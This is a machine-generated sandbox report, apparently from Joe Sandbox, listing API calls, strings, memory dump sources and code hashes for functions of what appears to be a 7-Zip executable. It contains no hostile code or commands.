                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$memmove
                                                                                                                                                                                                                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                                                • API String ID: 2879976980-73314117
                                                                                                                                                                                                                                • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                • Instruction ID: d41164f6901a15b9d47b16047dabb4719439d1bb873d4b4fe85aac0bed874479
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83414976619A49D6DB20EF25F8843ADB3A1F794784F801526EB8E83764DF78C949CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00211CF9
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00211DEE
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00211F07
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00211F5C
                                                                                                                                                                                                                                  • Part of subcall function 0021171C: fputs.MSVCRT ref: 00211744
                                                                                                                                                                                                                                  • Part of subcall function 0021171C: fputs.MSVCRT ref: 00211758
                                                                                                                                                                                                                                  • Part of subcall function 0021171C: free.MSVCRT ref: 0021176B
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                • free.MSVCRT ref: 00211F86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                • API String ID: 2553544393-24972044
                                                                                                                                                                                                                                • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                • Instruction ID: d0e2a900e82c48e4eee3318789cb7c3d55b09e2001befda4f1ba6547f21dade6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0A14A66314A85AACA29EF62E5903ED7361F778B80F484126DB6E47B11DF78D8F4C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowfputs
                                                                                                                                                                                                                                • String ID: Decoding ERROR
                                                                                                                                                                                                                                • API String ID: 117389134-2585761706
                                                                                                                                                                                                                                • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                • Instruction ID: 3afbe86ff6e7f55b9def4c825bfb6ac025dd39c8b1c763a28866a94a08519832
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F731D46272A9C191CE30EF25E8803EDA3A1F7A1780F485523CA5E57758DF78C9E5CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 001FA8CA
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 001FA8E8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 001FA908
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FA985
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FA996
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                                                • API String ID: 852969883-606380122
                                                                                                                                                                                                                                • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                • Instruction ID: fa7c6282c5213fb597d70c05909f71d7393056aa8ea27c052c80c4ae695ee8d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC41C076200B449ADB20EF26E85036E6360FB94B98F888525DF9E47765EF7CD886C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 0021B723
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021B743
                                                                                                                                                                                                                                  • Part of subcall function 001D38C8: memmove.MSVCRT(001DA0E5), ref: 001D3907
                                                                                                                                                                                                                                  • Part of subcall function 001D3A64: memmove.MSVCRT ref: 001D3AAA
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0021B49E
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 0021B4E3
                                                                                                                                                                                                                                • wcscmp.MSVCRT ref: 0021B502
                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 0021B568
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                • API String ID: 591578422-4150638102
                                                                                                                                                                                                                                • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                • Instruction ID: ce55cc9901e852bd6a0ac1ba4abec7abe8754cc89bd1f3db64fcd82c77dfb143
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AA14B77710A85ABCB2ADF2AD69029DB3B1F764784F808016DB5A47B11DF34E8B6C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212F7E
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212F9D
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212FB6
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212FC1
                                                                                                                                                                                                                                  • Part of subcall function 001D2C78: free.MSVCRT ref: 001D2CAE
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212FCC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs
                                                                                                                                                                                                                                • String ID: = $h<"
                                                                                                                                                                                                                                • API String ID: 2444650769-3841148799
                                                                                                                                                                                                                                • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                • Instruction ID: 295eeb5d81bfb5351f5b9fe55a2aafd9d4ee533c4e4d5367ee488c9d68888d99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D215162224940D5CA20EF25E4912AEA770EBF57D0F445223FF6E47B69DF38C99AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C11
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C19
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C3B
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9D2A
                                                                                                                                                                                                                                • wcscmp.MSVCRT ref: 001F9E66
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9ECA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9ED4
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F13
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F1B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F28
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F49
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F51
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3584677832-0
                                                                                                                                                                                                                                • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                • Instruction ID: bfcab6aa907e1443868649bc00cbc22b4684fdac69a714c96ef78b474b194993
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641E632304A8491CA10FF16E88026EA761F7A5BE8F495226EF7D47769DF38C84AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                • Instruction ID: f50c6ea1cfa4aefd99b2b06836326a47cc1d6f466c9b2650a054f9ef7d2402e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46314E71124B82C6EB50DF28E99839A77B1F3A4764F511236EA7D436A4DF3CC995CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                • Instruction ID: 45284dd71a726d9e3981522fdbd1eca1b2c31bfc79da6a3a07553c35840cab27
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F118C23740A8887CA24FE22D99112A2320EBB3BB070C8222DF3D57795DF20E8628310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                • Instruction ID: a772b3b492b6f7544dd66ca63c47d4f1def8083bc0c931422d82617648ae4779
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611A522311A4486CF14EF75D8A122D7320FBE1F99B188662EB7E4B765CF34D8468354
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                • Instruction ID: 3923b0b3ec52ea6cd391059b208f2774fa0611c3a9490910319bb0569121a31d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB515773200A4591CB10EF25D4902AE6721F7E5FC8F948023EB5E9776ACF38CA9AC741
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 002115D5
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
